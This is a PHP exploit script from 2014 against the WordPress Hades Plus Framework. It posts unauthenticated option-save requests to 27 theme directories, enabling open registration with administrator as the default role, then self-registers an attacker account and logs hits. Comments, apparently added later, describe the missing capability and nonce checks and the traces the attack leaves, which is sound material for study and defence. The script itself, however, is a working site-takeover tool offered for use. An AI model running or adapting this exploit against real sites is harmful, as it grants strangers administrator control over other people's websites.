[EXPLOIT]=> Wordpress -Hades Plus Add ADM / INURL - BRASIL

Sep 18th, 2014
  1. <?php
  2. /*
  3. ----------------------------------------------------------
  4. *NAME*: Wordpress -Hades Plus Add ADM / INURL - BRASIL
  5. *TIPE*: User improper inclusion
  6. *Tested on*: Linux
  7. *EXECUTE*: php exploit.php http://www.target.us you@mail.com
  8. *OUTPUT*: 0day_Hades_Plus_Framework_Add_Administrator.txt
  9. *AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
  10. *EMAIL*: inurllbr@gmail.com
  11. *Blog*: http://blog.inurl.com.br
  12. *Twitter*: https://twitter.com/googleinurl
  13. *Fanpage*: https://fb.com/InurlBrasil
  14. *GIT*: https://github.com/googleinurl
  15. *YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  16. *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
  17. ----------------------------------------------------------
  18.  
  19. *Description:*
  20. This exploit allows an attacker to add new users through the /hades_framework/option_panel/ajax.php way sending request post completed.
  21. This failure is in bristle web 27 Themas:
  22. appius,Consultant,appius1,archin,averin,dagda,echea,felici,GantiDengantema,kmp,kmp2,themanya,liberal,liberal-media-bias,linguini,livewire,majestics,mathis,mazine,
  23. Orchestra, shopsum, shotzz, test, Viteeo, vithy, yvora, sodales.
  24. ----------------------------------------------------------
  25.  
  26. *Usage Information:*
  27. php exploit.php http://www.target.gov.us you@mail.com
  28.  
  29. Logic:
  30. $ params ['email'] = 'you_email';
  31. $ params ['user'] = 'inurlbrasil';
  32.  
  33. EXPLOIT POST:
  34. values[0][name]=users_can_register&values[0][value]=1&values[1][name]=admin_email&values[1][value]={$params['email']}&values[2][name]=default_role&values[2][value]=administrator&action=save;
  35.  
  36. if (result the requisition == success) {
  37. is a possible vulnerable and sent one Feedback activation of inurlbrasil usuraio.
  38. }
  39. ----------------------------------------------------------
  40. */
  // Proof-of-concept driver. argv[1] is the target site, argv[2] a mailbox the
  // operator controls. The script fingerprints the site and then POSTs one
  // option-save request to the hades_framework/option_panel/ajax.php handler of
  // each of 27 theme directories. The body sets three WordPress options
  // (users_can_register=1, admin_email=argv[2], default_role=administrator),
  // i.e. it relies on that handler persisting arbitrary options for a caller
  // who presents no WordPress session and no nonce.
  //
  // Defender notes: the server-side fix is to gate the handler with
  // current_user_can('manage_options') and check_ajax_referer(). Signals this
  // script leaves behind: a GET to /?author=1 followed by unauthenticated POSTs
  // to */hades_framework/option_panel/ajax.php carrying action=save, and an
  // unexpected change of the users_can_register / default_role / admin_email
  // options followed by a self-registered administrator account.
  41. error_reporting(1);          // E_ERROR only: notices and warnings from the lookups below are hidden
  42. set_time_limit(0);
  43. ini_set('display_errors', 1);
  44. ini_set('max_execution_time', 0);
  45. ini_set('allow_url_fopen', 1); // file_get_contents()/get_headers() on URLs depend on this
  46. ob_implicit_flush(true);      // emit output as soon as it is printed
  47. ob_end_flush();
  48.  
  49. $params = array();
  50.  
  51. $params['email'] = $argv[2];  // taken verbatim from the CLI: not validated and not URL-encoded
  52. $params['user'] = 'inurlbrasil';
      // Raw form body for the option-save request (%5B/%5D are '[' and ']').
      // It carries only action=save plus the three option name/value pairs: no nonce field.
  53. $params['post'] = "values%5B0%5D%5Bname%5D=users_can_register&values%5B0%5D%5Bvalue%5D=1&values%5B1%5D%5Bname%5D=admin_email&values%5B1%5D%5Bvalue%5D={$params['email']}&values%5B2%5D%5Bname%5D=default_role&values%5B2%5D%5Bvalue%5D=administrator&action=save";
  54.  
      // NOTE(review): the fetched page body is never read again below.
  55. $corpo = file_get_contents($argv[1]);
      // Abort unless argv[1] looks like a URL; $alvo_[0][0] becomes the scheme+host
      // prefix (path dropped) that every later request is built on.
  56. !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL') : NULL;
  57.  
      // NOTE(review): this matches against the URL string, not against $corpo, so a
      // "WordPress ... />" generator tag cannot be found here; presumably $corpo was intended.
      // With preg_match_all, $version[0] is the array of full matches, so $str below
      // is an array (printed as "Array" or empty), not a version string.
  58. preg_match_all("#WordPress (.*?)/>#", $alvo_[0][0], $version);
  59. $str = str_replace('/>', '', $version[0]);
  60. $str = str_replace('"', '', $str);
      // Author-archive lookup: the <title> of /?author=1 exposes the first user's
      // display name (the part before '|'). Sites that block author-id redirects
      // return nothing useful here, which only affects the banner output.
  61. $users = file_get_contents("{$alvo_[0][0]}/?author=1");
  62. preg_match('/<title>(.*?)<\/title>/si', $users, $user);
  63. $wpuser = explode('|', $user[1]);   // assumes a "Name | Site" title; $user[1] is unset if no <title> matched
  64. $headers = get_headers($argv[1], 1); // associative form; $headers[0] is the status line
      // Banner and fingerprint output. Server / X-Pingback / X-Powered-By are read
      // without isset(); a missing header only raises a notice, which the
      // error_reporting(1) above suppresses.
  65. print "\r\n0x[EXPLOIT NAME]: WordPress 0day - Hades Plus Framework Add Administrator / INURL - BRASIL";
  66. print "\n--------------------------------------------------------------------------------------------------";
  67. print "\n0x[INFO]: ";
  68. print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
  69. print "\n0x[INFO]: ";
  70. is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
  71. print "\n0x[INFO]: ";
  72. is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) : print_r($headers['X-Pingback']);
  73. print "\n0x[INFO]: ";
  74. is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
  75. print "\n0x[INFO]: TARGET: {$alvo_[0][0]} | WP USER: " . str_replace("\n", '', $wpuser[0]) . " | VERSION: {$str} \n";
  76.  
  77.  
      // One probe per bundled theme directory (the 27 themes listed in the header).
      // Every call is independent; __request() prints and logs each hit or miss itself.
  78. __request($alvo_[0][0], '/wp-content/themes/appius/hades_framework/option_panel/ajax.php', $params);
  79. __request($alvo_[0][0], '/wp-content/themes/Consultant/hades_framework/option_panel/ajax.php', $params);
  80. __request($alvo_[0][0], '/wp-content/themes/appius1/hades_framework/option_panel/ajax.php', $params);
  81. __request($alvo_[0][0], '/wp-content/themes/archin/hades_framework/option_panel/ajax.php', $params);
  82. __request($alvo_[0][0], '/wp-content/themes/averin/hades_framework/option_panel/ajax.php', $params);
  83. __request($alvo_[0][0], '/wp-content/themes/dagda/hades_framework/option_panel/ajax.php', $params);
  84. __request($alvo_[0][0], '/wp-content/themes/echea/hades_framework/option_panel/ajax.php', $params);
  85. __request($alvo_[0][0], '/wp-content/themes/felici/hades_framework/option_panel/ajax.php', $params);
  86. __request($alvo_[0][0], '/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php', $params);
  87. __request($alvo_[0][0], '/wp-content/themes/kmp/hades_framework/option_panel/ajax.php', $params);
  88. __request($alvo_[0][0], '/wp-content/themes/kmp2/hades_framework/option_panel/ajax.php', $params);
  89. __request($alvo_[0][0], '/wp-content/themes/themanya/hades_framework/option_panel/ajax.php', $params);
  90. __request($alvo_[0][0], '/wp-content/themes/liberal/hades_framework/option_panel/ajax.php', $params);
  91. __request($alvo_[0][0], '/wp-content/themes/liberal-media-bias/hades_framework/option_panel/ajax.php', $params);
  92. __request($alvo_[0][0], '/wp-content/themes/linguini/hades_framework/option_panel/ajax.php', $params);
  93. __request($alvo_[0][0], '/wp-content/themes/livewire/hades_framework/option_panel/ajax.php', $params);
  94. __request($alvo_[0][0], '/wp-content/themes/majestics/hades_framework/option_panel/ajax.php', $params);
  95. __request($alvo_[0][0], '/wp-content/themes/mathis/hades_framework/option_panel/ajax.php', $params);
  96. __request($alvo_[0][0], '/wp-content/themes/mazine/hades_framework/option_panel/ajax.php', $params);
  97. __request($alvo_[0][0], '/wp-content/themes/Orchestra/hades_framework/option_panel/ajax.php', $params);
  98. __request($alvo_[0][0], '/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php', $params);
  99. __request($alvo_[0][0], '/wp-content/themes/shotzz/hades_framework/option_panel/ajax.php', $params);
  100. __request($alvo_[0][0], '/wp-content/themes/test/hades_framework/option_panel/ajax.php', $params);
  101. __request($alvo_[0][0], '/wp-content/themes/Viteeo/hades_framework/option_panel/ajax.php', $params);
  102. __request($alvo_[0][0], '/wp-content/themes/vithy/hades_framework/option_panel/ajax.php', $params);
  103. __request($alvo_[0][0], '/wp-content/themes/yvora/hades_framework/option_panel/ajax.php', $params);
  104. __request($alvo_[0][0], '/wp-content/themes/sodales/hades_framework/option_panel/ajax.php', $params);
  105.  
  /**
   * Sends one POST to $url . $plugin with $params['post'] as the raw body and
   * reports whether the response looks like a hit.
   *
   * Stage one (caller passes a theme ajax.php path): a body containing the
   * substring 'success' is treated as "options saved". The hit is printed,
   * appended to 0day_Hades_Plus_Framework_Add_Administrator.txt, and the
   * function calls itself once against /wp-login.php?action=register to
   * self-register $params['user'] — which can only take effect if stage one
   * really enabled users_can_register and set default_role to administrator.
   *
   * Defender notes: the request carries no WordPress auth cookie and no nonce,
   * so on the server the missing controls are a capability check and a nonce
   * check on the option-save handler. For incident response, audit the
   * users_can_register, default_role and admin_email options and any
   * administrator accounts created around the timestamps written to the log.
   *
   * @param string $url    Scheme + host prefix (from $alvo_[0][0]); also sent as Referer.
   * @param string $plugin Path appended to $url: a theme ajax.php or the register endpoint.
   * @param array  $params 'post' is the body; 'user' and 'email' are read only on a hit.
   * @return void  Results go to stdout and to the log file.
   */
  106. function __request($url, $plugin, $params) {
  107.  
  108.     $objcurl = curl_init();
  109.     curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
  110.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);   // capture the body instead of echoing it
  111.     curl_setopt($objcurl, CURLOPT_HEADER, 0);           // body only; the status code is never inspected
           // Browser-like headers. X-Requested-With mimics a jQuery AJAX call; the
           // Cookie is a fixed value, not a WordPress session, so the request is
           // deliberately unauthenticated.
  112.     curl_setopt($objcurl, CURLOPT_HTTPHEADER, array(
  113.         'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  114.         'Accept: application/json, text/javascript, */*; q=0.01',
  115.         'X-Requested-With: XMLHttpRequest',
  116.         "Referer: {$url}",
  117.         'Accept-Language: en-US,en;q=0.5',
  118.         'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
  119.     ));
           // Referer is set a second time here (with the path); which value libcurl
           // finally sends is not evident from this code.
  120.     curl_setopt($objcurl, CURLOPT_REFERER, $url . $plugin);
  121.     curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']); // string body => POST request
  122.  
  123.     $corpo = curl_exec($objcurl);   // false on transport error, which the substring test below treats as a miss
  124.     curl_close($objcurl);
  125.  
           // Vulnerability oracle: any 'success' substring anywhere in the response body.
  126.     if (strstr($corpo, 'success')) {
  127.  
               // Log record: timestamp, endpoint, raw response, and the user/email being registered.
  128.         $res = "\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------\n0x[INFO][VULN]: [ " . date("d-m-Y H:i:s") . " ]\n";
  129.         $res.= "\n0x[INFO][VULN]: {$url}{$plugin} - RETURN=> [ {$corpo} ] / {$params['user']}, EMAIL=> " . urldecode($params['email']);
  130.         $res.= "\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------\n";
  131.         print $res;
               // Stage two: recursive call to the WordPress self-registration endpoint for
               // $params['user']. The path check in the else branch below exists to keep
               // that inner call's miss output quiet.
  132.         $admin['post'] = urlencode("user_login={$params['user']}&user_email={$params['email']}&redirect_to=&wp-submit=Inscription");
  133.         (strstr($corpo, 'success') ? __request($url, '/wp-login.php?action=register', $admin) : NULL);   // condition is already true here (same test as above)
  134.         file_put_contents('0day_Hades_Plus_Framework_Add_Administrator.txt', "{$res}\n", FILE_APPEND);   // log lives in the current working directory
  135.     } else {
               // Misses are reported for theme probes only; the register call stays silent.
  136.         print (($plugin != '/wp-login.php?action=register') ?  "\n0x[INFO][NOT VULN]: {$url}{$plugin} "  : NULL);
  137.     }
  138. }